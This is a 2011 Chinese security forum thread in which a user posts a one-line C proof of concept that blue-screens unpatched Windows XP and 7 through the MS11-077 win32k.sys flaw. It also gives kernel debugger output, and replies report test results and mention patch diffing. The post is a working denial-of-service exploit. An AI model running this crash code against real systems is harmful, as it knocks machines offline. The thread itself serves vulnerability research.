首页
论坛
课程
招聘
[原创]MS11-077的一个BSOD代码
2011-10-19 15:52 11310

[原创]MS11-077的一个BSOD代码

2011-10-19 15:52
11310
/*
* 【作者:KiDebug】
* 【E-Mail:Google¥pku.edu.cn】
*/
#include <Windows.h>

void main()
{
        SendNotifyMessage((HWND)-1,0x180,0,0);
}

测试系统:
Windows XP SP3,不安装其他任何安全软件:
WindowsXPprosp3VOL微软原版+正版密钥.iso
user32.dll(5.1.2600.5512)
win32k.sys(5.1.2600.5512,小于5.1.2600.6149的应该都可以)

0: kd> r
eax=0000001d ebx=bf80ee6b ecx=ffffffff edx=bc5d0650 esi=ffffffff edi=ee0a3d64
eip=bf8cfecc esp=ee0a3d08 ebp=ee0a3d08 iopl=0 nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206
win32k!NtUserfnINLBOXSTRING+0x8:
bf8cfecc 8b4120 mov eax,dword ptr [ecx+20h] ds:0023:0000001f=????????

0: kd> kp
ChildEBP RetAddr
ee0a3d08 bf80eed3 win32k!NtUserfnINLBOXSTRING+0x8
ee0a3d40 8054261c win32k!NtUserMessageCall+0xae
ee0a3d40 7c92e4f4 nt!KiFastCallEntry+0xfc
0012ff3c 77d194be ntdll!KiFastSystemCallRet
0012ff64 00401011 USER32!NtUserMessageCall+0xc
0012ff78 00401148 1!main(void)+0x11 [r:\temp\1\1.cpp @ 6]
0012ffc0 7c817067 1!__tmainCRTStartup(void)+0x10b [f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c @ 278]
0012fff0 00000000 kernel32!BaseProcessStart+0x23

[2022冬季班]《安卓高级研修班(网课)》月薪两万班招生中~

收藏
点赞0
打赏
分享
最新回复 (20)
雪    币: 1334
活跃值: 活跃值 (293)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
lylxd 活跃值 2011-10-19 17:06
2
0
..........
雪    币: 448
活跃值: 活跃值 (25)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
guobing 活跃值 2011-10-19 17:07
3
0
....伊美儿 挺酷的。。。
雪    币: 599
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
猪猡公园 活跃值 2011-10-19 17:50
4
0
简约而不简单。
雪    币: 218
活跃值: 活跃值 (285)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
dayang 活跃值 2011-10-19 18:39
5
0
KiDebug出品,值得一看!
雪    币: 218
活跃值: 活跃值 (285)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
dayang 活跃值 2011-10-19 18:49
6
0
XP SP2,NO PATCH,NO BSOD!
雪    币: 540
活跃值: 活跃值 (278)
能力值: ( LV12,RANK:320 )
在线值:
发帖
回帖
粉丝
evilkis 活跃值 7 2011-10-19 18:56
7
0
First Blood.
雪    币: 195
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
fxliutm 活跃值 2011-10-19 19:19
8
0
我试了一下,360弹出警告,并没有BSOD啊。
雪    币: 6
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
vincentzl 活跃值 2011-10-19 20:56
9
0
楼主能不能解释下参数的意思?
雪    币: 464
活跃值: 活跃值 (49)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
KiDebug 活跃值 4 2011-10-19 22:47
10
0
我虚拟机里面纯净的XP SP2、SP3、Windows 7 SP1都能蓝。。
雪    币: 15999
活跃值: 活跃值 (3242)
能力值: ( LV15,RANK:880 )
在线值:
发帖
回帖
粉丝
obaby 活跃值 20 2011-10-19 23:35
11
0
前来膜拜。膜拜(字数不够,再写一遍)
雪    币: 281
活跃值: 活跃值 (391)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
MengXP 活跃值 2011-10-20 09:43
12
0
xp sp3蓝了..........
雪    币: 464
活跃值: 活跃值 (49)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
KiDebug 活跃值 4 2011-10-21 15:26
13
0
测试系统:
Windows XP SP3,不安装其他任何安全软件:
WindowsXPprosp3VOL微软原版+正版密钥.iso
user32.dll(5.1.2600.5512)
win32k.sys(5.1.2600.5512,5.1.2600.6119)

0: kd> r
eax=0000001d ebx=bf80ee6b ecx=ffffffff edx=bc5d0650 esi=ffffffff edi=ee0a3d64
eip=bf8cfecc esp=ee0a3d08 ebp=ee0a3d08 iopl=0 nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206
win32k!NtUserfnINLBOXSTRING+0x8:
bf8cfecc 8b4120 mov eax,dword ptr [ecx+20h] ds:0023:0000001f=????????

0: kd> kp
ChildEBP RetAddr
ee0a3d08 bf80eed3 win32k!NtUserfnINLBOXSTRING+0x8
ee0a3d40 8054261c win32k!NtUserMessageCall+0xae
ee0a3d40 7c92e4f4 nt!KiFastCallEntry+0xfc
0012ff3c 77d194be ntdll!KiFastSystemCallRet
0012ff64 00401011 USER32!NtUserMessageCall+0xc
0012ff78 00401148 1!main(void)+0x11 [r:\temp\1\1.cpp @ 6]
0012ffc0 7c817067 1!__tmainCRTStartup(void)+0x10b [f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c @ 278]
0012fff0 00000000 kernel32!BaseProcessStart+0x23
雪    币: 253
活跃值: 活跃值 (52)
能力值: ( LV8,RANK:140 )
在线值:
发帖
回帖
粉丝
代码疯子 活跃值 3 2011-10-21 15:44
14
0
不知道这类bug你是如何发现的呢?
雪    币: 839
活跃值: 活跃值 (106)
能力值: ( LV11,RANK:180 )
在线值:
发帖
回帖
粉丝
Vsbat 活跃值 4 2011-10-21 15:53
15
0
你又出手了
咋不弄个头像...
雪    币: 389
活跃值: 活跃值 (1131)
能力值: ( LV3,RANK:25 )
在线值:
发帖
回帖
粉丝
KooJiSung 活跃值 2011-10-21 16:20
16
0
要是可以提权就好了,估计是鸡肋才发出来吧
雪    币: 53
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
nomaster 活跃值 2011-10-21 16:26
17
0
我试试,要是2分钟之内没回帖,那我就是蓝了。。。
雪    币: 53
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
nomaster 活跃值 2011-10-21 16:27
18
0
没蓝,除了360在鬼喊鬼叫,啥事也没有
雪    币: 464
活跃值: 活跃值 (49)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
KiDebug 活跃值 4 2011-10-21 16:33
19
0
补丁比对一下就出来了







测试系统:
Windows XP SP3,不安装其他任何安全软件:
雪    币: 215
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
caocunt 活跃值 2011-10-24 17:58
20
0
路过看看,
雪    币: 8
活跃值: 活跃值 (10)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
xnhandt 活跃值 2011-12-15 10:30
21
0
This one may help you:
https://community.qualys.com/blogs/securitylabs/2011/12/02/ms11-077-from-patch-to-proof-of-concept
游客
登录 | 注册 方可回帖
返回